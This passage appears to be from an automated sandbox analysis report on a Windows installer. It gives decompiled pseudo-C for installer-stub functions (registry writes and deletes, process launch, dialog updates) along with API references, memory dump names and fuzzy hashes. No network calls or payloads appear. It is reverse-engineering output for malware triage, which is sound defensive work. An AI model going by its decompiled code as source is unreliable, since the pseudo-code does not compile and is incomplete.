                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
                                        • RegCloseKey.ADVAPI32(?), ref: 00402B3A
                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
                                        • RegCloseKey.ADVAPI32(?), ref: 00402B56
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Close$DeleteEnumOpen
                                        • String ID:
                                        • API String ID: 1912718029-0
                                        • Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                        • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
                                        • Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
                                        • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401D32, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00401D32() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
				GetClientRect(_t25, _t27 - 0x40);
				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                        0x00401d3e
                                        0x00401d45
                                        0x00401d74
                                        0x00401d7c
                                        0x00401d83
                                        0x00401d83
                                        0x00402932
                                        0x0040293e

                                        APIs
                                        • GetDlgItem.USER32 ref: 00401D38
                                        • GetClientRect.USER32 ref: 00401D45
                                        • LoadImageA.USER32 ref: 00401D66
                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
                                        • DeleteObject.GDI32(00000000), ref: 00401D83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                        • Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
                                        • Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
                                        • Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00404545, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 35%
                                        			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);
				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");
				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);
			}













                                        0x0040454d
                                        0x00404551
                                        0x00404559
                                        0x0040455c
                                        0x0040455d
                                        0x0040455f
                                        0x00404561
                                        0x00404564
                                        0x00404564
                                        0x0040456b
                                        0x00404571
                                        0x00404571
                                        0x00404578
                                        0x00404583
                                        0x00404584
                                        0x00404587
                                        0x00404587
                                        0x00404594
                                        0x0040459f
                                        0x004045a2
                                        0x004045b4
                                        0x004045bb
                                        0x004045bc
                                        0x004045cb
                                        0x004045db
                                        0x004045f7

                                        APIs
                                        • lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
                                        • wsprintfA.USER32 ref: 004045DB
                                        • SetDlgItemTextA.USER32 ref: 004045EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                        • Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
                                        • Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
                                        • Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401C19, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 54%
                                        			E00401C19(void* __ecx) {
				signed int _t30;
				CHAR* _t33;
				long _t34;
				int _t39;
				signed int _t40;
				int _t44;
				void* _t46;
				int _t51;
				struct HWND__* _t55;
				void* _t58;

				_t46 = __ecx;
				 *(_t58 - 8) = E00402A9A(0x33);
				 *(_t58 + 8) = E00402A9A(0x44);
				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));
				}
				__eflags =  *(_t58 - 0x10) & 0x00000002;
				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t53 = E00402A9A();
					_t30 = E00402A9A();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t33 =  ~( *_t29) & _t53;
					__eflags = _t33;
					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
					goto L10;
				} else {
					_t55 = E00402A7D();
					_t39 = E00402A7D();
					_t51 =  *(_t58 - 0x10) >> 2;
					if(__eflags == 0) {
						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
						L10:
						 *(_t58 - 0x34) = _t34;
					} else {
						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
					_push( *(_t58 - 0x34));
					E0040591D();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}













                                        0x00401c19
                                        0x00401c22
                                        0x00401c2e
                                        0x00401c31
                                        0x00401c3b
                                        0x00401c3b
                                        0x00401c3e
                                        0x00401c42
                                        0x00401c4c
                                        0x00401c4c
                                        0x00401c4f
                                        0x00401c53
                                        0x00401c55
                                        0x00401ca2
                                        0x00401ca4
                                        0x00401cad
                                        0x00401cb5
                                        0x00401cb8
                                        0x00401cb8
                                        0x00401cc1
                                        0x00000000
                                        0x00401c57
                                        0x00401c5e
                                        0x00401c60
                                        0x00401c68
                                        0x00401c6b
                                        0x00401c93
                                        0x00401cc7
                                        0x00401cc7
                                        0x00401c6d
                                        0x00401c7b
                                        0x00401c83
                                        0x00401c86
                                        0x00401c86
                                        0x00401c6b
                                        0x00401cca
                                        0x00401ccd
                                        0x00401cd3
                                        0x004028d7
                                        0x004028d7
                                        0x00402932
                                        0x0040293e

                                        APIs
                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                        • Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
                                        • Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                        • Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401E9C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49synchronizationCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 83%
                                        			E00401E9C() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A9A(_t24);
				E00404D62(0xffffffeb, _t13);
				_t15 = E00405247(_t28, "C:\\Users\\jones\\AppData\\Local\\Temp");
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405CFC(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 0x34) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E0040591D(_t26,  *(_t31 - 0x34));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                        0x00401ea2
                                        0x00401ea7
                                        0x00401eb2
                                        0x00401eb9
                                        0x00401ebc
                                        0x004026da
                                        0x00401ec2
                                        0x00401ec5
                                        0x00401ed6
                                        0x00401ed1
                                        0x00401ed1
                                        0x00401eeb
                                        0x00401ef4
                                        0x00401f04
                                        0x00401f06
                                        0x00401f06
                                        0x00401ef6
                                        0x00401efa
                                        0x00401efa
                                        0x00401ef4
                                        0x00401f0d
                                        0x00401f10
                                        0x00401f10
                                        0x00402932
                                        0x0040293e

                                        APIs
                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                          • Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                          • Part of subcall function 00405247: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                          • Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290
                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
                                        • GetExitCodeProcess.KERNEL32 ref: 00401EEB
                                        • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
                                        • String ID: C:\Users\user\AppData\Local\Temp
                                        • API String ID: 4003922372-47812868
                                        • Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                        • Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
                                        • Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                        • Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405247, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31processCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00405247(CHAR* _a4, CHAR* _a8) {
				struct _PROCESS_INFORMATION _v20;
				signed char _t10;
				int _t12;

				0x7a1588->cb = 0x44;
				_t10 = GetFileAttributesA(_a8);
				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
					_a8 = 0;
				}
				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
				if(_t12 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t12;
			}






                                        0x00405250
                                        0x0040525a
                                        0x00405265
                                        0x0040526b
                                        0x0040526b
                                        0x00405283
                                        0x0040528b
                                        0x00405290
                                        0x00000000
                                        0x00405296
                                        0x0040529a

                                        APIs
                                        • GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                        • CloseHandle.KERNEL32(?), ref: 00405290
                                        Strings
                                        • Error launching installer, xrefs: 00405247
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: AttributesCloseCreateFileHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 2000254098-66219284
                                        • Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                        • Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
                                        • Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                        • Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004054CC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004054CC(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                        0x004054cd
                                        0x004054e4
                                        0x004054ec
                                        0x004054ec
                                        0x004054f4

                                        APIs
                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
                                        • lstrcatA.KERNEL32(?,00409010), ref: 004054EC
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-3081826266
                                        • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                        • Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
                                        • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                        • Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402386, Relevance: 6.1, APIs: 4, Instructions: 69registrystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 85%
                                        			E00402386(void* __eax, void* __eflags) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t33;
				void* _t35;

				_t15 = E00402B61(__eax);
				_t33 =  *((intOrPtr*)(_t35 - 0x14));
				 *(_t35 - 0x30) =  *(_t35 - 0x10);
				 *(_t35 - 0x44) = E00402A9A(2);
				_t18 = E00402A9A(0x11);
				 *(_t35 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
				if(_t19 == 0) {
					if(_t33 == 1) {
						E00402A9A(0x23);
						_t19 = lstrlenA(0x40a418) + 1;
					}
					if(_t33 == 4) {
						_t24 = E00402A7D(3);
						 *0x40a418 = _t24;
						_t19 = _t33;
					}
					if(_t33 == 3) {
						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
					}
					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
						 *(_t35 - 4) = _t27;
					}
					_push( *(_t35 + 8));
					RegCloseKey();
				}
				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
				return 0;
			}










                                        0x00402387
                                        0x0040238c
                                        0x00402396
                                        0x004023a0
                                        0x004023a3
                                        0x004023b5
                                        0x004023bc
                                        0x004023c4
                                        0x004023d2
                                        0x004023d6
                                        0x004023e1
                                        0x004023e1
                                        0x004023e5
                                        0x004023e9
                                        0x004023ef
                                        0x004023f4
                                        0x004023f4
                                        0x004023f8
                                        0x00402404
                                        0x00402404
                                        0x0040241d
                                        0x0040241f
                                        0x0040241f
                                        0x00402422
                                        0x004024fb
                                        0x004024fb
                                        0x00402932
                                        0x0040293e

                                        APIs
                                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
                                        • lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
                                        • RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
                                        • RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CloseCreateValuelstrlen
                                        • String ID:
                                        • API String ID: 1356686001-0
                                        • Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                        • Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
                                        • Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                        • Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401F4B, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 85%
                                        			E00401F4B(char __ebx, char* __edi, char* __esi) {
				char* _t21;
				int _t22;
				void* _t33;

				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
				_t21 = E00402A9A(0xffffffee);
				 *(_t33 - 0x2c) = _t21;
				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
				 *__esi = __ebx;
				 *(_t33 - 8) = _t22;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t33 - 4)) = 1;
				if(_t22 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp - 0x34) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp + 8;
							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp - 0x34));
						GlobalFree();
					}
				}
